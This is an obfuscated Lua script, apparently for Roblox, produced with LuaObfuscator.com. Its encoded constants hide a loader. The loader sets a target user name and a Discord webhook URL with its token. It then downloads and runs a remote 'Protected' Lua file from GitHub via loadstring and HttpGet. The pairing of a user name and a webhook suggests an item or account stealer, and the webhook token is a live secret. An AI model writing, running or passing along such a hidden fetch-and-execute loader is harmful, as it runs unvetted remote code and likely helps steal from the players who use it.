--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=0;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-((2 + 0) -(958 -(892 + 65))))))%((3 -1)^(((v33-(2 -1)) -(v32-(1638 -(1523 + (271 -157))))) + (620 -(555 + 64)))) ;return v85-(v85%1) ;end end else local v86=931 -(857 + 74) ;local v87;while true do if (v86==(1065 -(68 + (1842 -845)))) then v87=2^(v32-((1043 -474) -(367 + 45 + 156))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=350 -(87 + 263) ;local v35;local v36;local v37;local v38;while true do if (v34==(181 -(67 + 113))) then return (v38 * (12302277 + 4474939)) + (v37 * (160901 -(172988 -77623))) + (v36 * 256) + v35 ;end if (v34==(0 + 0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (11 -8) );v19=v19 + (956 -(802 + 150)) ;v34=2 -(1 + 0) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if ((0 + 0)~=v39) then else v40=0 -0 ;v41=nil;v39=1 + 0 ;end if (v39~=(563 -(306 + 254))) then else v46=nil;v47=nil;v39=1 + 3 ;end if (v39==1) then v42=nil;v43=nil;v39=2;end if (v39~=(3 -1)) then else v44=nil;v45=nil;v39=3;end if (4~=v39) then else while true do if (v40~=0) then else local v102=1467 -(899 + 568) ;while true do if (v102==1) then v40=1 + 0 ;break;end if (v102~=(0 -0)) then else v41=603 -(268 + 335) ;v42=nil;v102=291 -(60 + 230) ;end end end if (v40~=(573 -(426 + 146))) then else local v103=0;while true do if (v103~=1) then else v40=2;break;end if (v103==0) then v43=nil;v44=nil;v103=1 + 0 ;end end end if (v40==3) then v47=nil;while true do local v105=0;while true do if (v105~=(1457 -(282 + 1174))) then else if (v41==(814 -(569 + 242))) then local v108=0;while true do if (0~=v108) then else for v160=2 -1 ,v24() do v43[v160-(1 + 0) ]=v29();end return v45;end end end if (v41==(1024 -(706 + 318))) then local v109=0;while true do if (v109==(1252 -(721 + 530))) then v44={};v41=1;break;end if (v109~=(1271 -(945 + 326))) then else v42={};v43={};v109=1;end end end break;end if (v105~=(0 -0)) then else if (v41==(1 + 0)) then local v110=0;while true do if (0==v110) then v45={v42,v43,nil,v44};v46=v24();v110=1501 -(1408 + 92) ;end if (v110==(1087 -(461 + 625))) then v47={};v41=1290 -(993 + 295) ;break;end end end if (v41~=(1 + 1)) then else for v112=1,v46 do local v113=1171 -(418 + 753) ;local v114;local v115;local v116;local v117;local v118;while true do if (v113~=(1 + 1)) then else v118=nil;while true do if (v114==(0 + 0)) then local v180=0 + 0 ;while true do if ((1 + 0)==v180) then v114=1;break;end if (v180==(529 -(406 + 123))) then v115=0;v116=nil;v180=1770 -(1749 + 20) ;end end end if (v114==2) then while true do if (v115~=(1 + 0)) then else v118=nil;while true do if (0~=v116) then else local v188=0;local v189;local v190;while true do if (v188==0) then v189=0;v190=nil;v188=1;end if (v188==(1323 -(1249 + 73))) then while true do if (v189~=0) then else v190=0 + 0 ;while true do if (v190==(1145 -(466 + 679))) then local v207=0;while true do if ((2 -1)==v207) then v190=2 -1 ;break;end if (v207==0) then v117=v22();v118=nil;v207=1;end end end if (v190~=(1901 -(106 + 1794))) then else v116=1;break;end end break;end end break;end end end if (v116==1) then if (v117==1) then v118=v22()~=(0 + 0) ;elseif (v117==(1 + 1)) then v118=v25();elseif (v117~=(8 -5)) then else v118=v26();end v47[v112]=v118;break;end end break;end if (v115==0) then v116=0 -0 ;v117=nil;v115=1;end end break;end if (v114~=1) then else local v181=114 -(4 + 110) ;while true do if (v181~=(584 -(57 + 527))) then else v117=nil;v118=nil;v181=1;end if (v181==(1428 -(41 + 1386))) then v114=2;break;end end end end break;end if (v113~=(103 -(17 + 86))) then else v114=0 + 0 ;v115=nil;v113=1;end if (v113==1) then v116=nil;v117=nil;v113=2;end end end v45[3]=v22();for v119=1 -0 ,v24() do local v120=0;local v121;local v122;while true do if (v120~=1) then else while true do if (v121~=0) then else v122=v22();if (v21(v122,2 -1 ,1)==(166 -(122 + 44))) then local v182=0 -0 ;local v183;local v184;local v185;local v186;local v187;while true do if (v182~=2) then else v187=nil;while true do if (v183==0) then local v192=0;local v193;while true do if (v192==(0 -0)) then v193=0 + 0 ;while true do if (v193~=(0 + 0)) then else local v205=0;while true do if (v205~=(1 -0)) then else v193=66 -(30 + 35) ;break;end if (v205~=0) then else v184=0 + 0 ;v185=nil;v205=1;end end end if (v193~=(1258 -(1043 + 214))) then else v183=3 -2 ;break;end end break;end end end if ((1214 -(323 + 889))==v183) then while true do if (v184~=2) then else local v196=0 -0 ;local v197;while true do if (v196==(580 -(361 + 219))) then v197=320 -(53 + 267) ;while true do if ((1 + 0)~=v197) then else v184=416 -(15 + 398) ;break;end if (v197==(982 -(18 + 964))) then local v208=0;local v209;while true do if (v208==(0 -0)) then v209=0;while true do if (v209~=0) then else if (v21(v186,1 + 0 ,1 + 0 )~=(851 -(20 + 830))) then else v187[2]=v47[v187[2 + 0 ]];end if (v21(v186,128 -(116 + 10) ,2)==(1 + 0)) then v187[3]=v47[v187[741 -(542 + 196) ]];end v209=1;end if (v209~=1) then else v197=1;break;end end break;end end end end break;end end end if (v184==0) then local v198=0;local v199;while true do if (v198~=0) then else v199=0;while true do if (v199~=0) then else local v210=0 -0 ;local v211;while true do if ((0 + 0)==v210) then v211=0 + 0 ;while true do if (v211==(1 + 0)) then v199=1;break;end if (v211==0) then v185=v21(v122,4 -2 ,7 -4 );v186=v21(v122,1555 -(1126 + 425) ,411 -(118 + 287) );v211=3 -2 ;end end break;end end end if (v199==1) then v184=1122 -(118 + 1003) ;break;end end break;end end end if (3==v184) then if (v21(v186,8 -5 ,380 -(142 + 235) )~=(4 -3)) then else v187[4]=v47[v187[4]];end v42[v119]=v187;break;end if (v184~=(1 + 0)) then else local v201=0;local v202;while true do if (v201~=0) then else v202=977 -(553 + 424) ;while true do if (v202~=(1 -0)) then else v184=2;break;end if (v202~=(0 + 0)) then else local v212=0 + 0 ;local v213;while true do if ((0 + 0)~=v212) then else v213=0 + 0 ;while true do if (v213==0) then local v214=0 + 0 ;while true do if (v214~=1) then else v213=1;break;end if (0==v214) then v187={v23(),v23(),nil,nil};if (v185==(0 -0)) then local v219=753 -(239 + 514) ;local v220;while true do if (v219~=0) then else v220=0;while true do if (v220~=(0 + 0)) then else v187[1332 -(797 + 532) ]=v23();v187[3 + 1 ]=v23();break;end end break;end end elseif (v185==1) then v187[3]=v24();elseif (v185==2) then v187[2 + 1 ]=v24() -(2^16) ;elseif (v185~=3) then else local v225=0 -0 ;local v226;local v227;while true do if (v225==0) then v226=0;v227=nil;v225=1203 -(373 + 829) ;end if (v225~=1) then else while true do if (v226~=0) then else v227=0;while true do if (v227==(731 -(476 + 255))) then v187[3]=v24() -((1132 -(369 + 761))^(10 + 6)) ;v187[4]=v23();break;end end break;end end break;end end end v214=1;end end end if ((1 -0)~=v213) then else v202=1;break;end end break;end end end end break;end end end end break;end if (v183==1) then local v194=0 -0 ;local v195;while true do if (v194~=(238 -(64 + 174))) then else v195=0;while true do if (v195~=(1 + 0)) then else v183=2 -0 ;break;end if (v195==0) then local v206=0;while true do if (v206~=0) then else v186=nil;v187=nil;v206=1;end if (v206==(337 -(144 + 192))) then v195=1;break;end end end end break;end end end end break;end if (v182==1) then v185=nil;v186=nil;v182=2;end if (v182==0) then v183=216 -(42 + 174) ;v184=nil;v182=1;end end end break;end end break;end if (v120==(0 + 0)) then v121=0;v122=nil;v120=1 + 0 ;end end end v41=2 + 1 ;end v105=1;end end end break;end if (v40==2) then local v104=0;while true do if (v104==(1505 -(363 + 1141))) then v40=3;break;end if (v104~=0) then else v45=nil;v46=nil;v104=1581 -(1183 + 397) ;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=1125 -(936 + 189) ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(2 -1)) then v51=1 + 0 ;v52=(v21(v50,1 + 0 ,1158 -(782 + 356) ) * ((269 -(57 + 119 + 91))^(82 -50))) + v49 ;v48=1977 -(1913 + 62) ;end if (v48==(0 + 0)) then v49=v24();v50=v24();v48=1093 -(975 + 117) ;end if (v48==(5 -3)) then v53=v21(v50,1954 -(565 + (3266 -(260 + 1638))) ,109 -78 );v54=((v21(v50,32)==(3 -2)) and  -((443 -(382 + 58)) -2)) or (1662 -(1477 + (589 -405))) ;v48=(3 + 0) -0 ;end if (v48==(3 + 0)) then if (v53==(856 -(564 + 292))) then if (v52==(0 -0)) then return v54 * (0 -(0 -0)) ;else v53=1;v51=304 -(244 + 60) ;end elseif (v53==(3274 -(322 + 905))) then return ((v52==(0 + 0)) and (v54 * ((477 -(41 + 435))/((3534 -2345) -(449 + 740))))) or (v54 * NaN) ;end return v8(v54,v53-(2024 -(938 + (1268 -(902 + 303)))) ) * (v51 + (v52/((949 -(245 + 702))^(40 + 12)))) ;end end end v26=nil;function v26(v55)local v56=0 -0 ;local v57;local v58;while true do if (v56==(0 -0)) then v57=nil;if  not v55 then local v99=0 + 0 ;while true do if (v99==((5700 -4010) -(1121 + 569))) then v55=v24();if (v55==(214 -(22 + 192))) then return "";end break;end end end v56=1;end if (v56==(684 -((1119 -636) + 200))) then v57=v3(v16,v19,(v19 + v55) -(1464 -(1404 + 59)) );v19=v19 + v55 ;v56=5 -3 ;end if ((2 -0)==v56) then v58={};for v91=1, #v57 do v58[v91]=v2(v1(v3(v57,v91,v91)));end v56=768 -(468 + (537 -240)) ;end if (v56==(565 -(334 + 228))) then return v6(v58);end end end v18=5;end if (v18==2) then function v22()local v59=v1(v16,v19,v19);v19=v19 + 1 ;return v59;end v23=nil;function v23()local v60=0;local v61;local v62;while true do if (v60==(1 + 0)) then return (v62 * (492 -(141 + 95))) + v61 ;end if (v60==(0 + (0 -0))) then v61,v62=v1(v16,v19,v19 + (4 -2) );v19=v19 + (4 -2) ;v60=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then v20=v0(v3(v63,1,1));return "";else local v88=v2(v0(v63,16));if v20 then local v93=0;local v94;while true do if (v93==0) then v94=v5(v88,v20);v20=nil;v93=1;end if (v93==1) then return v94;end end else return v88;end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=v64[1];local v68=v64[2];local v69=v64[3];return function(...)local v70=v67;local v71=v68;local v72=v69;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v90=0;while true do if (v90==0) then v82=v70[v74];v83=v82[1];v90=1;end if (1==v90) then if (v83<=5) then if (v83<=2) then if (v83<=0) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>1) then v80[v82[2]]=v82[3]~=0 ;else local v125;local v126,v127;local v128;local v129;v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v66[v82[3]];v74=v74 + 1 ;v82=v70[v74];v129=v82[2];v128=v80[v82[3]];v80[v129 + 1 ]=v128;v80[v129]=v128[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v82=v70[v74];v129=v82[2];v126,v127=v73(v80[v129](v13(v80,v129 + 1 ,v82[3])));v75=(v127 + v129) -1 ;v125=0;for v154=v129,v75 do v125=v125 + 1 ;v80[v154]=v126[v125];end v74=v74 + 1 ;v82=v70[v74];v129=v82[2];v80[v129]=v80[v129](v13(v80,v129 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end elseif (v83<=3) then v66[v82[3]]=v80[v82[2]];elseif (v83>4) then v80[v82[2]]=v66[v82[3]];else local v141=0;local v142;local v143;while true do if (v141==1) then v80[v142 + 1 ]=v143;v80[v142]=v143[v82[4]];break;end if (v141==0) then v142=v82[2];v143=v80[v82[3]];v141=1;end end end elseif (v83<=8) then if (v83<=6) then v80[v82[2]]();elseif (v83>7) then v80[v82[2]]=v82[3];else local v146=v82[2];local v147,v148=v73(v80[v146](v13(v80,v146 + 1 ,v82[3])));v75=(v148 + v146) -1 ;local v149=0;for v157=v146,v75 do v149=v149 + 1 ;v80[v157]=v147[v149];end end elseif (v83<=10) then if (v83==9) then local v150=0;while true do if (v150==0) then v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v150=1;end if (v150==3) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v150=4;end if (v150==2) then v66[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v150=3;end if (v150==1) then v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v150=2;end if (v150==4) then v74=v82[3];break;end end else v74=v82[3];end elseif (v83>11) then do return;end else local v152=v82[2];v80[v152]=v80[v152](v13(v80,v152 + 1 ,v75));end v74=v74 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O003953485749574845030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5661706F72656F6E536372697074732F4469616D6F6E642F6D61696E2F50726F7465637465645F3137363733312O3739313437333431362E6C756103083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130372O3233373438313532363832393037362F677A4554524B75575F572D634F78377A3564556D6F3268664B4C422D6C74367771385267456B304761757265344A576C496450683343666A766C7442766A68316434684D00173O0012083O00013O00264O000E0001000200040A3O000E0001001208000100043O001201000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100264O00010001000100040A3O00010001001208000100043O001209000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O000C3O00017O00",v9(),...);
